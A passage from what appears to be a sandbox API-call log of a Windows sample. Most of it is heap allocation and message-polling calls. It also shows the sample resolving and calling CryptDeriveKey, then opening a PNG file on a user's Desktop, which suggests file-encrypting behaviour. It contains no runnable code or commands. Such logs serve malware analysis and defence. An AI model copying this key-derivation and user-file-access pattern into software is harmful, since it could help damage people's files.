cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0188.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa280, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.180] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0188.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.181] CryptDeriveKey (in: hProv=0xa9ffb0, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0188.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.188] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.189] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.189] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.191] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.191] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.191] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.191] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.191] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.192] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.192] CryptDestroyHash (hHash=0xaa5920) returned 1 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/nJNF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njnf.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0188.194] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.194] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0188.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x25c0000, 